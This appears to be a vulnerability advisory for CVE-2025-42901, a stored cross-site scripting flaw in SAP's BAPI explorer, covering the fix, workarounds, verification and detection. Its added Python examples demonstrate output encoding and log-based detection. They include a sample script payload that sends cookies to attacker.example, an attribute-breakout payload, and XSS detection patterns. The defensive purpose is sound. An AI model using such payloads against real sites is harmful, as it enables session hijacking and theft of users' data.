CVE-2025-42901
📋 TL;DR
CVE-2025-42901 is a stored cross-site scripting (XSS) vulnerability in the BAPI explorer of SAP Application Server for ABAP. An authenticated attacker can store a script payload through the affected functionality; because the stored value is later returned to the browser without adequate output encoding, it executes in the browser of every other user who views it. SAP ABAP systems running a vulnerable version of the BAPI explorer component are affected.
💻 Affected Systems
- SAP Application Server for ABAP
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test in a non-production system whether the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
An authenticated malicious user could steal session cookies, perform actions as other users, or redirect users to malicious sites, potentially leading to account compromise or data theft.
Likely Case
An authenticated attacker with basic privileges could perform limited session hijacking or defacement within the BAPI explorer interface.
If Mitigated
With context-appropriate output encoding (backed by input validation), the stored payload is displayed in the victim's browser as literal text instead of being parsed as markup or script.
🎯 Exploit Status
Requires authenticated access and knowledge of BAPI explorer functionality
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Apply SAP Note 3652788
Vendor Advisory: https://me.sap.com/notes/3652788
Restart Required: No
Instructions:
1. Download SAP Note 3652788 from the SAP Support Portal.
2. Apply the correction instructions provided in the note.
3. Verify the fix by testing BAPI explorer functionality.
🔧 Temporary Workarounds
Disable BAPI Explorer Access
Restrict or disable access to the BAPI explorer functionality for non-administrative users.
Use SAP authorization profiles to restrict S_DEVELOP access so that only the users who need the explorer can reach it.
Implement Content Security Policy
Add Content-Security-Policy headers to restrict script execution.
Configure the HTTP headers to disallow inline scripts and untrusted external sources. A CSP limits what an injected payload can do in the browser but does not remove a payload that is already stored, so treat it as defence in depth rather than a substitute for the SAP Note.
🧯 If You Can't Patch
- Implement strict input validation and, above all, context-appropriate output encoding for all user-supplied data rendered by the BAPI explorer (input filtering alone is bypassable; encoding at output time is the control that neutralises stored XSS)
- Monitor and audit BAPI explorer usage for suspicious activity, in particular stored values that contain HTML markup
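The "If Mitigated" statement above and the first item in this list both rest on the same point: output encoding turns a stored payload into inert text. The following added example (not code from SAP or from the original page) models that with a vulnerable and a hardened render function for a hypothetical page fragment that echoes a stored description in both an attribute and an element context. The template, function names and the two sample payloads are assumptions made for illustration; the real BAPI explorer page is not shown. A minimal HTML parser stands in for the browser and reports which tags and attributes the markup actually produces.

```python
"""Added example, not code from SAP or from the original page: why output
encoding neutralises stored XSS.  Template, names and payloads are assumptions
made for illustration only.
"""
import html
from html.parser import HTMLParser

# Constructed sample payloads an attacker could store through an input field.
SCRIPT_PAYLOAD = "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>"
ATTRIBUTE_PAYLOAD = '" onmouseover="alert(document.domain)'  # breaks out of value="..."

# Hypothetical page fragment that echoes a stored description in two contexts:
# inside a quoted attribute value and as element text.
TEMPLATE = '<input name="descr" value="{value}"><p class="descr">{value}</p>'


def render_unsafe(stored_value: str) -> str:
    """Vulnerable pattern: the stored value is interpolated verbatim."""
    return TEMPLATE.format(value=stored_value)


def render_safe(stored_value: str) -> str:
    """Hardened pattern: HTML-encode at output time.  quote=True also encodes
    the quote characters, which is what stops the attribute breakout."""
    return TEMPLATE.format(value=html.escape(stored_value, quote=True))


class _Collector(HTMLParser):
    """Minimal stand-in for the browser: records which tags and attributes
    the markup produces, with entity references decoded."""

    def __init__(self) -> None:
        super().__init__()
        self.tags = []
        self.input_attrs = {}
        self.text = ""

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.input_attrs = dict(attrs)

    def handle_data(self, data):
        self.text += data


def analyse(rendered: str) -> dict:
    parser = _Collector()
    parser.feed(rendered)
    parser.close()
    return {"tags": parser.tags, "input_attrs": parser.input_attrs, "text": parser.text}


def is_neutralised(rendered: str, payload: str) -> bool:
    """True when the payload survives only as text: no tag beyond the two the
    template itself emits, no injected event-handler attribute, and the decoded
    attribute value and element text both equal the original string."""
    result = analyse(rendered)
    injected_handlers = [a for a in result["input_attrs"] if a.startswith("on")]
    return (
        result["tags"] == ["input", "p"]
        and not injected_handlers
        and result["input_attrs"].get("value") == payload
        and result["text"] == payload
    )


if __name__ == "__main__":
    for payload in (SCRIPT_PAYLOAD, ATTRIBUTE_PAYLOAD):
        print("unsafe neutralised:", is_neutralised(render_unsafe(payload), payload))
        print("safe   neutralised:", is_neutralised(render_safe(payload), payload))
```

For the unsafe renderer the parser sees a third tag (script) for the first payload and an injected onmouseover attribute for the second; for the safe renderer it sees only the two template tags, and the decoded value round-trips to the original string, which is exactly the "rendered harmless as text" outcome. Encoding is context-specific: a value placed into a URL attribute would additionally need scheme validation, which this fragment does not model.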
🔍 How to Verify
Check if Vulnerable:
Compare your system's release and support package level with the versions listed in SAP Note 3652788, and, in a non-production system, enter harmless probe values containing characters such as < and " into BAPI explorer input fields to see whether they are returned HTML-encoded or rendered as markup
Check Version:
Use System > Status (component information) to check the SAP_BASIS release and support package level, and transaction SM51 to check the kernel release
Verify Fix Applied:
After applying SAP Note 3652788, re-run the same probe values against the BAPI explorer and confirm that they are returned HTML-encoded (for example < as &lt;) rather than rendered as markup or executed as script
📡 Detection & Monitoring
Log Indicators:
- BAPI explorer use by accounts that do not normally use it, or unusually long or markup-containing values written through its input fields
- Stored values containing HTML tags, event-handler attributes (onerror=, onmouseover=) or javascript: URIs; a stored XSS payload does not appear as a "failed" attempt, so search for the payload itself rather than for errors
Network Indicators:
- Requests to BAPI explorer endpoints whose parameters or bodies contain script tags, event-handler attributes or javascript: URIs, including URL-encoded and entity-encoded variants
SIEM Query:
source="sap_abap_logs" AND message="*BAPI*" AND (message="*<script*" OR message="*javascript:*")
Scope the BAPI condition outside the parentheses so that every alert is tied to the BAPI explorer, and match on "<script" rather than a bare "*script*" wildcard, which also hits benign words such as "description".
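The detection logic above, implemented as a small detector over constructed log records so that the matching can be checked offline before it is encoded in a SIEM. This is an added example, not code from the original page or from SAP; the record layout, the endpoint path and the field names are assumptions, and real SAP HTTP or security audit log lines will differ. The detector decodes URL- and entity-encoding before matching, restricts alerts to the BAPI explorer endpoint, and matches on markup rather than the bare word "script".

```python
"""Added example, not from the original page or from SAP: an offline detector
for XSS payloads in values written through a BAPI explorer endpoint.  The log
layout, endpoint path and field names are assumptions for illustration.
"""
import re
from html import unescape
from urllib.parse import unquote

# Constructed sample records: (user, endpoint, value written).  Not real logs;
# the endpoint path is hypothetical.
SAMPLE_RECORDS = [
    ("DEV01", "/sap/bc/bapi_explorer", "Create sales order"),
    ("DEV02", "/sap/bc/bapi_explorer", "<script>alert(1)</script>"),
    ("DEV02", "/sap/bc/bapi_explorer", "%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E"),
    ("DEV03", "/sap/bc/bapi_explorer", "&lt;a href=&quot;javascript:alert(1)&quot;&gt;x&lt;/a&gt;"),
    ("DEV04", "/sap/bc/other_app", "<script>alert(1)</script>"),
    ("DEV05", "/sap/bc/bapi_explorer", "Describes the script used by batch job"),
]

# Markup-level patterns; a bare "script" substring is deliberately not one of them.
XSS_PATTERNS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "js_uri": re.compile(r"javascript\s*:", re.I),
    "event_handler": re.compile(r"<[^>]*\bon[a-z]+\s*=", re.I),
}


def normalise(value: str, rounds: int = 3) -> str:
    """Undo URL and HTML-entity encoding a few times so encoded and
    double-encoded payloads are compared in decoded form."""
    for _ in range(rounds):
        decoded = unescape(unquote(value))
        if decoded == value:
            break
        value = decoded
    return value


def classify(value: str) -> list:
    """Return the names of the patterns the decoded value matches."""
    decoded = normalise(value)
    return [name for name, rx in XSS_PATTERNS.items() if rx.search(decoded)]


def detect(records, endpoint_marker: str = "bapi_explorer") -> list:
    """Apply the endpoint scope first, then the payload patterns, mirroring
    the boolean structure  endpoint AND (pattern1 OR pattern2 ...)."""
    hits = []
    for user, endpoint, value in records:
        if endpoint_marker not in endpoint.lower():
            continue
        reasons = classify(value)
        if reasons:
            hits.append({"user": user, "endpoint": endpoint,
                         "reasons": reasons, "decoded": normalise(value)})
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_RECORDS):
        print(hit["user"], hit["reasons"], repr(hit["decoded"]))
```

Run on the sample records this flags the plain script tag, the URL-encoded img/onerror payload and the entity-encoded javascript: link, while leaving the benign sentence containing the word "script" and the identical payload against a non-BAPI endpoint alone. The rounds limit on decoding keeps the detector from looping on pathological input.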